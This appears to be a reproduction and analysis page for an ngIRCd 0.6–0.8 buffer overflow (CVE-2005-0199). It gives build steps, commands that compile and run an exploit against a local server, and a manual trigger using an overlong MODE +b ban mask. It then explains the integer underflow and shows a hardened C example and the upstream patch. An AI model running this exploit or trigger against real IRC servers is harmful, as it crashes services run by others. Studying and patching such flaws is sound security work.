CentOS 6.5
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2005-0199/ngircd-rel-0-8-0.zip
unzip ngircd-rel-0-8-0.zip
cd ngircd-rel-0-8-0
./configure
make
sudo make install
Server:
/usr/local/sbin/ngircd -n
Client:
gcc -o exploit 25070.c
./exploit 127.0.0.1 6667 b #TheName
Server:
/usr/local/sbin/ngircd -n
Client:
1. Connect to an ngIRCd daemon with netcat or telnet.
2. Type:
USER a b c d
NICK b
JOIN #b
MODE #b +b aaaa....aa@aaaa...aaa
ngIRCd Remote Buffer Overflow Vulnerability
ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow
There is a buffer overflow in ngIRCd, in Lists_MakeMask() in src/ngircd/lists.c. It is caused by an integer underflow in line 317:
at = strchr( Pattern, '@' );
......
if(( at ) && ( ! excl ))
{
/* User fehlt */
*at = '\0'; at++;
317 strlcpy( TheMask, Pattern, sizeof( TheMask ) - strlen( at ) - 4 );
strlcat( TheMask, "!*@", sizeof( TheMask ));
strlcat( TheMask, at, sizeof( TheMask ));
return TheMask;
}
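strlen( at ) + 4 can be larger than sizeof( TheMask ). The size argument is an unsigned size_t, so in that case the subtraction wraps around to a very large value and strlcpy() no longer limits the copy to the size of TheMask.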
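The size arithmetic from line 317, as an added example that is not ngIRCd's code: it computes the strlcpy() limit in its original form and in the form sizeof( TheMask ) - 5, and adds a hypothetical make_mask_checked() that rejects over-long input instead of truncating it. MASK_LEN and all function names are assumptions; the page does not state the size of TheMask.

```c
#include <stdio.h>
#include <string.h>

#define MASK_LEN 64 /* assumed buffer size; not taken from the page */

/* Limit as written on line 317. size_t is unsigned, so the result wraps
 * around when strlen(at) + 4 > bufsize. */
size_t limit_before_fix(size_t bufsize, const char *at)
{
    return bufsize - strlen(at) - 4;
}

/* Limit in the corrected form: no longer depends on remote input. */
size_t limit_after_fix(size_t bufsize)
{
    return bufsize - 5;
}

/* Hypothetical hardened variant: builds "nick!*@host" from "nick@host".
 * Returns 0 on success, -1 if '@' is missing or the mask would not fit. */
int make_mask_checked(const char *pattern, char *out, size_t outsize)
{
    const char *at = strchr(pattern, '@');
    if (at == NULL)
        return -1;
    size_t nick_len = (size_t)(at - pattern);
    size_t host_len = strlen(at + 1);
    /* Need nick + "!*@" + host + NUL. Each subtraction is guarded by the
     * comparison before it, so none of them can wrap. */
    if (outsize < 4 || nick_len > outsize - 4 ||
        host_len > outsize - 4 - nick_len)
        return -1;
    snprintf(out, outsize, "%.*s!*@%s", (int)nick_len, pattern, at + 1);
    return 0;
}

int main(void)
{
    char host[101], out[MASK_LEN]; /* constructed sample input */
    memset(host, 'a', 100);
    host[100] = '\0';
    printf("before fix: %zu\n", limit_before_fix(MASK_LEN, host));
    printf("after fix:  %zu\n", limit_after_fix(MASK_LEN));
    if (make_mask_checked("b@example", out, sizeof out) == 0)
        printf("mask: %s\n", out);
    return 0;
}
```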
@@ -392,15 +393,15 @@
if(( at ) && ( ! excl ))
{
- /* User fehlt */
+ /* User name is missing */
*at = '\0'; at++;
- strlcpy( TheMask, Pattern, sizeof( TheMask ) - strlen( at ) - 4 );
+ strlcpy( TheMask, Pattern, sizeof( TheMask ) - 5 );
strlcat( TheMask, "!*@", sizeof( TheMask ));
strlcat( TheMask, at, sizeof( TheMask ));
return TheMask;
}
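Review bot: the new limit sizeof( TheMask ) - 5 on the strlcpy() line is a bare constant with no comment saying what the 5 bytes reserve (the "!*@" literal on the next line accounts for only 3 of them); please document the intent or derive the value from the literal's length. Separately, the return values of strlcpy() and both strlcat() calls are still ignored, so an over-long user or host part is silently truncated and the returned mask can differ from the one requested; consider rejecting the pattern when any of the three calls reports truncation.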
Details are in the patch link in the References section.
ngIRCd Buffer Overflow in Lists_MakeMask() Lets Remote Users Deny Service